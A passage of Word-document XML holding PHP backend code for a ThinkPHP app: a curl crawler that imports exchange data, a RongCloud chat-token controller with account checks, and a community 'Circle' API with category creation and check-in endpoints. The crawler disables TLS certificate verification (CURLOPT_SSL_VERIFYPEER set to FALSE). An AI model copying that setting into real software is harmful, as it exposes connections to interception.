      </w:r>
    </w:p>
    <w:p w14:paraId="2260A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while($page &lt;= $maxpage) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="720C0E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$url='https:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53970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$httph =curl_init($url);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643752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CURLOPT_SSL_VERIFYPEER, FALSE);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3971D8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CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8E4A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CURLOPT_RETURNTRANSFER,TRUE);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C94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CURLOPT_HTTPHEADER, $headers);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75477E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curl_setopt($httph, CURLINFO_HEADER_OUT, true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C16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$rst=curl_exec($httph);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FCF6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curl_close($httph);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3303A5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$data=json_decode($rst);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF83A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$page=$data-&gt;currpage;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F50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$maxpage=$data-&gt;maxpage;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21989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$page+=1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754194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foreach($data-&gt;data as $pf) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF95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$db=Db::name('platform')-&gt;where('exchange', $pf-&gt;id)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B43A1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$pfa=get_object_vars($pf);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8F66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$pfa['symbol_num']=$pfa['pairnum'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2462F0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$pfa['exchange']=$pfa['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029F66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$pfa['kind']='</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>交易所</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38287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unset($pfa['id']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03233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9E9EB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Db::name('platform')-&gt;where('exchange', $pfa['exchange'])-&gt;strict(false)-&gt;update($pfa);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DEBF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0BFD9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Db::name('platform')-&gt;strict(false)-&gt;insert($pfa);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B0103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E45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0DFE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exit('Done');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE2D7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73F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B352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121AD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53FE7C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app\api\controller\Common;  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F962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think\Db;       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E504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think\Session;  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="796F7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RongCloud\RongCloud;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E0E4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Rong extends Common</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="259B3D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FA13C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$rong;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="779F8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$member=null;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9DFC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__construct($tokenaaa=''){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DFADB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2BC8FA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$config=Db::name('member_config')-&gt;where('name','switch')-&gt;value('text');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58350A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05D8BD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 || $config==0){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D9AB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会员未开放</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A109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F0A3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$token=Session::get('user','ffxiangUser') ? Session::get('user','ffxiangUser') : input('post.token');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C7DA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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0B5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if($tokenaaa){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0018C3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$token=$tokenaaa;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5113F3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5634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json_encode(['err'=&gt;'token</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>不正确</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC927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8F3AC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333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497F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$uid=_decrypt($token);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B77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1243A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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>UID</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>不正确，请重新获取</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>token']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48FB07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6157F1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D207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$member=_user($uid);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65756C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64C77F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547591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3D6555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73999E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67670A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无法登录，原因是账户已被封号</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="771D3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8011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4726E6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A6345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0D76F8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281960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70A84F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040353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$data=['err'=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>账户正在审核，请等待客服处理</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA0FC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09A0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796DCE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497DA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0A6E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2E1A41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操作，账户审核被拒绝</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="405990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471AEC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账户审核被拒绝，拒绝原因：</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'.$member['hidetent']];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555F2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62D0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6FE9F9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7E09A4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2FFF6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A79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42C1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会员不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FE3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9AE06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4C0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$this-&gt;member=$member;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53515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config()['rong'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71BC5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$this-&gt;rong = new RongCloud($config['appKey'],$config['appSecret']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="618CB8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8E3B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token(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6181D8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$this-&gt;rong-&gt;user()-&gt;getToken($this-&gt;member['id'], $this-&gt;member['username'], _imgUrl().$this-&gt;member['img']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D544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$result;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F3D6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6B19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CB424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5DBF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733B30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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D03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0F23E3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6ED17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74967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Circle extends Common</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A974F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9C595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1C1701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398FD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D5DD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70AE9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82A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30037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6F49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186A47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E1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0EE6F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A59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424352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2BCD6C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02D7A4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_decrypt($token);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C4E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($member_id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB54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7F048B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6C6570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0AACBA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1F7AE4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489987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44E7A7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6178A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03BA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1C612A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56B05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889E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2BC0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1A720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237E02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3436E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39860B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6807A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69D989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598CDE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52F8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0700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5AA42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5FC158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177E8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6B29A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7C271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39961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4D5C50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8A8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7425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FCEA6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D5FC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D392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399C3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5CFE48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2235AA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E81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B629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386758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C4D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F106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878C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185B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/api/circle/create_type </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>创建社区分类</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7B4B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创建社区分类</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E119C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49DB2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0E19F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AB72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title     </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>社区分类名称（必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409C72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@apiParam {String} content   </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>社区分类描述说明（非必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE956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社区分类创建成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E964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社区分类创建失败</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="563A19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DDE3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3880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create_type()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F937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D56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0BBFD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7042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请先登录账号，然后创建社区分类</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4656A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04D87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694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11C1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input('param.title', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0133D8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($data['title'] == '') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF5C1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B0468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社区分类名称不可为空</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33386B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68EB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BE13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FB0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$circle_type = Db::name('circle_type')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2D42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$data['title'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225F58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EC72D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(!empty($circle_type)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A2503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90F01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同名社区分类已存在，请更换社区分类名称</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FACD6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203,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349B39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0C4C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EF9B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input('param.content', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1D21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0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9E50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638BFC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$circle_type_id = Db::name('circle_type')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C65DA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3A7BB8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($circle_type_id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37672D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C3B95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社区分类创建成功，请等待后台审核</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E108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08A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E17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73F1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社区分类创建失败，请稍后重试</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA38D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C83C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BCB2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059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B05D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/api/circle/types </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>获取社区分类列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25FEB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获取社区分类列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37DF4E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CC61D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77840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circle_types  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户社区分类列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4F82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用户社区分类</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444ABF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{String} title       </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户社区分类标题</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029025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用户社区分类描述说明</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF96A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circle_num </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户社区数量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71755D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9875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types()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D1D8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72BB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$circle_types = Db::name('circle_type')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068240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4DFCC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4966C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(count($circle_types) &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D9C8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($circle_types as $key =&gt; $circle_type) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F07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$circle_types[$key]['circle_num'] = Db::name('circle')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC00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-&gt;where('type_id', $circle_type['id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7492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51D2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C777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5174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json($circle_types);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13FCA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5DD6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F73B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/api/circle/create </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>创建社区</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37AEE6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创建社区</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD2DD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738BF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C765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42440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title     </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>社区名称（必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478FA9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type_id   </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>社区分类</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D55B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img       </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>社区图标（七牛图片文件名，</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>eg. 042e820210812091212723761.jpg</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）（必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5518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描述说明（非必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A96D2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用户社区创建成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67092A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用户社区创建失败</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A07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589647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366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create()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B43E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C57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3C58E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391CC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F7769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30D1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请先登录账号，然后创建社区</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B437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64CDA2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E642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A07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input('param.title', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="497CC7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($data['title'] == '') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="530FA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9A9E4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社区名称不可为空</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A72A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9284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68CF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ECB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 = Db::name('circle')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D40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-&gt;where('title', $data['title'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4932A4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6D451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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A425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D389B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同名社区已存在，请更换社区名称</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB73B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203,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="637125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A99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2434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$data['type_id'] = input('param.type_id', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C02BE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$data['img'] = input('param.img', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40627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input('param.content', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D936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3BB229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1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE24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$circle_id = Db::name('circle')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F948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10CE5C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($circle_id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C6B7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Db::name('circle_member')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D6A9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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D332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'circle_id' =&gt; $circle_id,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F734F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=&gt; $this-&gt;memberId,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B70D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1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8CD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'punch_in' =&gt; 0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574DB6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0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5B48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5808F5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ACD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34CED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用户社区创建成功，请等待后台审核</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="394A7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E32B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1BD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3F2EA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用户社区创建失败，请稍后重试</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1914B5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A750B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4711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86B4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B5DD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/api/circle/punch_in </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>当前登录用户社区签到</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A098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当前登录用户社区签到</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3BEC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37F67E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65A45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029DE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circle_id  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户社区</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71515B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用户社区签到成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59353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punches     </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户社区连续签到次数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68ACE8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sort        </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户社区签到排名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5ED1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total_sort  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户总榜签到排名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C992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用户社区签到失败</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496D98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C8B29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EC6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punch_in()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED2F8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95B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14B9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$data['member_id'] = $this-&gt;memberId;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BAF9E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B4E7E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D554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请先登录账号，然后签到</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B900E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208EF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3A6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0410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$data['circle_id'] = input('param.circle_id', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DFDC7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($data['circle_id'] == '') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BEAA8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444CB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用户社区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0E504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849B1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326C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729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 = Db::name('circle')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6246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$data['circle_id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24429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AAEB8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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BEF57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7F71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该用户社区不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C964D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0D1A94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AFA4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58B8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$circle_member = Db::name('circle_member')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06BA44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32E64A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7C1C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(empty($circle_member)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9BAC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22920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请先加入社区，然后签到</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC15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198E5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42C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7B7D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($circle_member['follow'] == 1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="359C22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(!$circle_member['update_time']) { </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41DCD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Db::name('circle_member')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51726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2DB174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0BC3CB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'punch_in' =&gt; 1, </w:t>
      </w:r>
